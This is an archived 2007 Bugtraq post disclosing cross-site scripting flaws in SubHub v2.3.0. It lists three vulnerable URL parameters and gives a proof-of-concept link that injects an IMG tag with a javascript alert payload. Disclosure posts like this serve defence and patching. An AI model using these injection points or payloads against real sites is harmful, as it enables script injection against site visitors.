lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070321230250.16563.qmail@securityfocus.com> Date: 21 Mar 2007 23:02:50 -0000 From: anon@...n.com To: bugtraq@...urityfocus.com Subject: **SubHub v2.3.0** **SubHub v2.3.0** Site: http://www.subhub.com/ & others that use this software Type of Expliot: XSS Version : 2.3.0 Discover: }T{-_-}T{ Bug in : /search?searchtext=<insert xss here> /calendar/?message=<insert xss here> /subscribe?message=<insert xss here> - - - - - - - - - - - - - - - - Exploit POC http://www.subhub.com/search?searchtext= <IMG SRC=javascript:alert('XSS')> - - - - - - - - - - - - - - - - Greetz to : -ZV-